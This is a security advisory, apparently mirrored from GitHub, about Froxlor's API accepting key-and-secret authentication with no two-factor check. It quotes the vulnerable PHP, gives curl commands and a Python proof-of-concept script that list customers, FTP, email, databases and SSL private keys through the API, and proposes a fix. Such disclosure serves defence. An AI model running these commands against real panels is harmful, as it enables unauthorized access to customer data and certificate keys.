GHSA-F9RX-7WF7-JR36

Vulnerability from github – Published: 2026-06-03 21:41 – Updated: 2026-06-09 13:07
VLAI
Summary
Froxlor's API Authentication bypasses 2FA Authentication
Details

Summary

Froxlor's API authentication (FroxlorRPC::validateAuth) does not enforce Two-Factor Authentication. When a user (admin or customer) enables 2FA on their account, the web UI correctly requires a TOTP code after password verification. However, the API accepts requests authenticated with only an API key and secret — no TOTP challenge is issued, checked, or required.

An attacker who obtains a leaked API key+secret for a 2FA-protected account has full access to all API operations without providing a second factor.

Affected Code

Web UI — 2FA enforced (index.php:82-149):

if ($result['type_2fa'] != 0) {
    // Redirects to 2FA input page
    // Calls FroxlorTwoFactorAuth::verifyCode()
    // Login is NOT completed without valid TOTP code
}

API — 2FA absent (lib/Froxlor/Api/FroxlorRPC.php:75-105):

private static function validateAuth(string $key, string $secret): bool
{
    $sel_stmt = Database::prepare("
        SELECT ak.*, a.api_allowed as admin_api_allowed,
               c.api_allowed as cust_api_allowed, c.deactivated
        FROM `api_keys` ak
        LEFT JOIN `panel_admins` a ON a.adminid = ak.adminid
        LEFT JOIN `panel_customers` c ON c.customerid = ak.customerid
        WHERE `apikey` = :ak AND `secret` = :as
    ");
    $result = Database::pexecute_first($sel_stmt, ['ak' => $key, 'as' => $secret]);
    if ($result) {
        if ($result['apikey'] == $key && $result['secret'] == $secret
            && ($result['valid_until'] == -1 || $result['valid_until'] >= time())
            && (($result['customerid'] == 0 && $result['admin_api_allowed'] == 1)
                || ($result['customerid'] > 0 && $result['cust_api_allowed'] == 1
                    && $result['deactivated'] == 0))) {
            // Checks: key match, secret match, not expired, API allowed, not deactivated
            // Missing: ANY check for type_2fa, TOTP verification, or 2FA status
            return true;
        }
    }
    throw new Exception('Invalid authorization credentials', 403);
}

There are zero references to 2FA, TOTP, type_2fa, or FroxlorTwoFactorAuth in the entire lib/Froxlor/Api/ directory:

$ grep -rn '2fa\|totp\|two.factor\|FroxlorTwoFactor' lib/Froxlor/Api/
# (no output)

PoC

Environment

  • Froxlor 2.3.5, clean Docker install (Debian Bookworm, PHP 8.2, Apache 2.4)
  • API enabled (api.enabled=1)
  • Admin account has 2FA enabled (type_2fa=1, TOTP configured)
  • Admin has an API key

Step 1: Confirm 2FA blocks web UI login

POST /index.php HTTP/1.1
Host: panel.example.com
Content-Type: application/x-www-form-urlencoded

loginname=admin&password=Admin123!@#&csrf_token=TOKEN&send=send

Result: Redirect to index.php?showmessage=4 — 2FA page. Login is NOT completed. The user cannot access the dashboard without entering a TOTP code.

Step 2: Authenticate via API — no TOTP required

curl -s -u "API_KEY:API_SECRET" \
  -H 'Content-Type: application/json' \
  -d '{"command":"Customers.listing","params":{}}' \
  https://panel.example.com/api.php

Result: HTTP 200 with full customer listing:

{
  "data": {
    "list": [
      {
        "loginname": "testcust",
        "email": "test@froxlor.lab",
        "name": "Test",
        "firstname": "Customer"
      }
    ]
  }
}

No TOTP code was provided. No 2FA prompt was returned. Full access granted.

Step 3: Access additional sensitive resources

All of these succeed without any 2FA challenge:

# Domains
curl -s -u "KEY:SECRET" -d '{"command":"Domains.listing"}' .../api.php
# FTP accounts (home directories, credentials)
curl -s -u "KEY:SECRET" -d '{"command":"Ftps.listing"}' .../api.php
# Email accounts
curl -s -u "KEY:SECRET" -d '{"command":"Emails.listing"}' .../api.php
# MySQL databases
curl -s -u "KEY:SECRET" -d '{"command":"Mysqls.listing"}' .../api.php
# SSL certificates (private keys)
curl -s -u "KEY:SECRET" -d '{"command":"Certificates.listing"}' .../api.php
# DNS records
curl -s -u "KEY:SECRET" -d '{"command":"DomainZones.listing","params":{"domainname":"example.com"}}' .../api.php

165 API functions are accessible, including write operations (Customers.update, Domains.add, Ftps.add, etc.).

Automated PoC Script

#!/usr/bin/env python3
"""Froxlor <= 2.3.x — 2FA Bypass via API (CWE-287)"""
import json, sys, requests, urllib3
urllib3.disable_warnings()

target, key, secret = sys.argv[1], sys.argv[2], sys.argv[3]

r = requests.post(f"{target}/api.php", auth=(key, secret),
    json={"command": "Customers.listing", "params": {}}, verify=False)
data = r.json()

print(f"HTTP {r.status_code}")
if "data" in data:
    for c in data["data"].get("list", []):
        print(f"  {c['loginname']} | {c['email']}")
    print(f"\n2FA-protected account accessed without TOTP. {len(data['data'].get('list',[]))} customers exposed.")

Usage: python3 poc.py https://panel.example.com API_KEY API_SECRET

Impact

When a user enables 2FA, they expect all access to their account requires a second factor. The API completely bypasses this expectation:

  • Customer data: PII (name, email, address) readable and modifiable
  • Domains: Full control over domains, subdomains, DNS records
  • Email accounts: Create, read, delete email accounts and forwarders
  • FTP accounts: Access home directory paths and credentials
  • MySQL databases: Full database management
  • SSL certificates: Read private keys, modify certificate bindings
  • 165 API functions: Including all write operations

API keys can be leaked through database backups, log files, config file exposure (GHSA-34qg-65m4-f23m demonstrated DB credential leaks), or compromised automation scripts. Users who enabled 2FA specifically to protect against credential compromise are not protected.

Comparison with CVE-2023-3173

CVE-2023-3173 ("2FA Bypass by Brute Force") was accepted as Critical ($60 bounty) and fixed by adding rate limiting to 2FA verification. This finding is architecturally different — the API authentication path has no 2FA logic at all. No brute force is needed; the second factor is simply never requested.

Suggested Fix

Add 2FA verification to FroxlorRPC::validateAuth(). When the authenticated user has type_2fa != 0, require a TOTP code as an additional API parameter:

// lib/Froxlor/Api/FroxlorRPC.php, after line 100:
// Check 2FA if enabled for this user
if (!empty($result['adminid'])) {
    $user = Database::pexecute_first(
        Database::prepare("SELECT type_2fa, data_2fa FROM panel_admins WHERE adminid = :id"),
        ['id' => $result['adminid']]
    );
} else {
    $user = Database::pexecute_first(
        Database::prepare("SELECT type_2fa, data_2fa FROM panel_customers WHERE customerid = :id"),
        ['id' => $result['customerid']]
    );
}
if ($user && $user['type_2fa'] != 0) {
    // Require X-2FA-Code header or 'totp_code' in request body
    $totp_code = $_SERVER['HTTP_X_2FA_CODE'] ?? null;
    if (empty($totp_code)) {
        throw new Exception('2FA code required', 401);
    }
    $tfa = new FroxlorTwoFactorAuth($user['data_2fa']);
    if (!$tfa->verifyCode($totp_code)) {
        throw new Exception('Invalid 2FA code', 403);
    }
}

Alternatively, disable API key creation for accounts with 2FA enabled, or require 2FA re-verification when generating new API keys.

Severity
8.1 (High)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "froxlor/froxlor"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.3.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-52793"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-287"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-03T21:41:12Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "## Summary\n\nFroxlor\u0027s API authentication (`FroxlorRPC::validateAuth`) does not enforce Two-Factor Authentication. When a user (admin or customer) enables 2FA on their account, the web UI correctly requires a TOTP code after password verification. However, the API accepts requests authenticated with only an API key and secret \u2014 no TOTP challenge is issued, checked, or required.\n\nAn attacker who obtains a leaked API key+secret for a 2FA-protected account has full access to all API operations without providing a second factor.\n\n## Affected Code\n\n**Web UI \u2014 2FA enforced** (`index.php:82-149`):\n\n```php\nif ($result[\u0027type_2fa\u0027] != 0) {\n    // Redirects to 2FA input page\n    // Calls FroxlorTwoFactorAuth::verifyCode()\n    // Login is NOT completed without valid TOTP code\n}\n```\n\n**API \u2014 2FA absent** (`lib/Froxlor/Api/FroxlorRPC.php:75-105`):\n\n```php\nprivate static function validateAuth(string $key, string $secret): bool\n{\n    $sel_stmt = Database::prepare(\"\n        SELECT ak.*, a.api_allowed as admin_api_allowed,\n               c.api_allowed as cust_api_allowed, c.deactivated\n        FROM `api_keys` ak\n        LEFT JOIN `panel_admins` a ON a.adminid = ak.adminid\n        LEFT JOIN `panel_customers` c ON c.customerid = ak.customerid\n        WHERE `apikey` = :ak AND `secret` = :as\n    \");\n    $result = Database::pexecute_first($sel_stmt, [\u0027ak\u0027 =\u003e $key, \u0027as\u0027 =\u003e $secret]);\n    if ($result) {\n        if ($result[\u0027apikey\u0027] == $key \u0026\u0026 $result[\u0027secret\u0027] == $secret\n            \u0026\u0026 ($result[\u0027valid_until\u0027] == -1 || $result[\u0027valid_until\u0027] \u003e= time())\n            \u0026\u0026 (($result[\u0027customerid\u0027] == 0 \u0026\u0026 $result[\u0027admin_api_allowed\u0027] == 1)\n                || ($result[\u0027customerid\u0027] \u003e 0 \u0026\u0026 $result[\u0027cust_api_allowed\u0027] == 1\n                    \u0026\u0026 $result[\u0027deactivated\u0027] == 0))) {\n            // Checks: key match, secret match, not expired, API allowed, not deactivated\n            // Missing: ANY check for type_2fa, TOTP verification, or 2FA status\n            return true;\n        }\n    }\n    throw new Exception(\u0027Invalid authorization credentials\u0027, 403);\n}\n```\n\nThere are zero references to 2FA, TOTP, `type_2fa`, or `FroxlorTwoFactorAuth` in the entire `lib/Froxlor/Api/` directory:\n\n```bash\n$ grep -rn \u00272fa\\|totp\\|two.factor\\|FroxlorTwoFactor\u0027 lib/Froxlor/Api/\n# (no output)\n```\n\n## PoC\n\n### Environment\n\n- Froxlor 2.3.5, clean Docker install (Debian Bookworm, PHP 8.2, Apache 2.4)\n- API enabled (`api.enabled=1`)\n- Admin account has 2FA enabled (`type_2fa=1`, TOTP configured)\n- Admin has an API key\n\n### Step 1: Confirm 2FA blocks web UI login\n\n```\nPOST /index.php HTTP/1.1\nHost: panel.example.com\nContent-Type: application/x-www-form-urlencoded\n\nloginname=admin\u0026password=Admin123!@#\u0026csrf_token=TOKEN\u0026send=send\n```\n\n**Result:** Redirect to `index.php?showmessage=4` \u2014 2FA page. Login is NOT completed. The user cannot access the dashboard without entering a TOTP code.\n\n### Step 2: Authenticate via API \u2014 no TOTP required\n\n```bash\ncurl -s -u \"API_KEY:API_SECRET\" \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  -d \u0027{\"command\":\"Customers.listing\",\"params\":{}}\u0027 \\\n  https://panel.example.com/api.php\n```\n\n**Result:** HTTP 200 with full customer listing:\n\n```json\n{\n  \"data\": {\n    \"list\": [\n      {\n        \"loginname\": \"testcust\",\n        \"email\": \"test@froxlor.lab\",\n        \"name\": \"Test\",\n        \"firstname\": \"Customer\"\n      }\n    ]\n  }\n}\n```\n\nNo TOTP code was provided. No 2FA prompt was returned. Full access granted.\n\n### Step 3: Access additional sensitive resources\n\nAll of these succeed without any 2FA challenge:\n\n```bash\n# Domains\ncurl -s -u \"KEY:SECRET\" -d \u0027{\"command\":\"Domains.listing\"}\u0027 .../api.php\n# FTP accounts (home directories, credentials)\ncurl -s -u \"KEY:SECRET\" -d \u0027{\"command\":\"Ftps.listing\"}\u0027 .../api.php\n# Email accounts\ncurl -s -u \"KEY:SECRET\" -d \u0027{\"command\":\"Emails.listing\"}\u0027 .../api.php\n# MySQL databases\ncurl -s -u \"KEY:SECRET\" -d \u0027{\"command\":\"Mysqls.listing\"}\u0027 .../api.php\n# SSL certificates (private keys)\ncurl -s -u \"KEY:SECRET\" -d \u0027{\"command\":\"Certificates.listing\"}\u0027 .../api.php\n# DNS records\ncurl -s -u \"KEY:SECRET\" -d \u0027{\"command\":\"DomainZones.listing\",\"params\":{\"domainname\":\"example.com\"}}\u0027 .../api.php\n```\n\n165 API functions are accessible, including write operations (`Customers.update`, `Domains.add`, `Ftps.add`, etc.).\n\n### Automated PoC Script\n\n```python\n#!/usr/bin/env python3\n\"\"\"Froxlor \u003c= 2.3.x \u2014 2FA Bypass via API (CWE-287)\"\"\"\nimport json, sys, requests, urllib3\nurllib3.disable_warnings()\n\ntarget, key, secret = sys.argv[1], sys.argv[2], sys.argv[3]\n\nr = requests.post(f\"{target}/api.php\", auth=(key, secret),\n    json={\"command\": \"Customers.listing\", \"params\": {}}, verify=False)\ndata = r.json()\n\nprint(f\"HTTP {r.status_code}\")\nif \"data\" in data:\n    for c in data[\"data\"].get(\"list\", []):\n        print(f\"  {c[\u0027loginname\u0027]} | {c[\u0027email\u0027]}\")\n    print(f\"\\n2FA-protected account accessed without TOTP. {len(data[\u0027data\u0027].get(\u0027list\u0027,[]))} customers exposed.\")\n```\n\nUsage: `python3 poc.py https://panel.example.com API_KEY API_SECRET`\n\n## Impact\n\nWhen a user enables 2FA, they expect all access to their account requires a second factor. The API completely bypasses this expectation:\n\n- **Customer data**: PII (name, email, address) readable and modifiable\n- **Domains**: Full control over domains, subdomains, DNS records\n- **Email accounts**: Create, read, delete email accounts and forwarders\n- **FTP accounts**: Access home directory paths and credentials\n- **MySQL databases**: Full database management\n- **SSL certificates**: Read private keys, modify certificate bindings\n- **165 API functions**: Including all write operations\n\nAPI keys can be leaked through database backups, log files, config file exposure (GHSA-34qg-65m4-f23m demonstrated DB credential leaks), or compromised automation scripts. Users who enabled 2FA specifically to protect against credential compromise are not protected.\n\n### Comparison with CVE-2023-3173\n\nCVE-2023-3173 (\"2FA Bypass by Brute Force\") was accepted as **Critical ($60 bounty)** and fixed by adding rate limiting to 2FA verification. This finding is architecturally different \u2014 the API authentication path has no 2FA logic at all. No brute force is needed; the second factor is simply never requested.\n\n## Suggested Fix\n\nAdd 2FA verification to `FroxlorRPC::validateAuth()`. When the authenticated user has `type_2fa != 0`, require a TOTP code as an additional API parameter:\n\n```php\n// lib/Froxlor/Api/FroxlorRPC.php, after line 100:\n// Check 2FA if enabled for this user\nif (!empty($result[\u0027adminid\u0027])) {\n    $user = Database::pexecute_first(\n        Database::prepare(\"SELECT type_2fa, data_2fa FROM panel_admins WHERE adminid = :id\"),\n        [\u0027id\u0027 =\u003e $result[\u0027adminid\u0027]]\n    );\n} else {\n    $user = Database::pexecute_first(\n        Database::prepare(\"SELECT type_2fa, data_2fa FROM panel_customers WHERE customerid = :id\"),\n        [\u0027id\u0027 =\u003e $result[\u0027customerid\u0027]]\n    );\n}\nif ($user \u0026\u0026 $user[\u0027type_2fa\u0027] != 0) {\n    // Require X-2FA-Code header or \u0027totp_code\u0027 in request body\n    $totp_code = $_SERVER[\u0027HTTP_X_2FA_CODE\u0027] ?? null;\n    if (empty($totp_code)) {\n        throw new Exception(\u00272FA code required\u0027, 401);\n    }\n    $tfa = new FroxlorTwoFactorAuth($user[\u0027data_2fa\u0027]);\n    if (!$tfa-\u003everifyCode($totp_code)) {\n        throw new Exception(\u0027Invalid 2FA code\u0027, 403);\n    }\n}\n```\n\nAlternatively, disable API key creation for accounts with 2FA enabled, or require 2FA re-verification when generating new API keys.",
  "id": "GHSA-f9rx-7wf7-jr36",
  "modified": "2026-06-09T13:07:18Z",
  "published": "2026-06-03T21:41:12Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/froxlor/froxlor/security/advisories/GHSA-f9rx-7wf7-jr36"
    },
    {
      "type": "ADVISORY",
      "url": "https://github.com/advisories/GHSA-34qg-65m4-f23m"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/froxlor/froxlor"
    },
    {
      "type": "WEB",
      "url": "https://github.com/froxlor/froxlor/releases/tag/2.3.7"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Froxlor\u0027s API Authentication bypasses 2FA Authentication"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.





Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Detection rules are retrieved from Rulezet.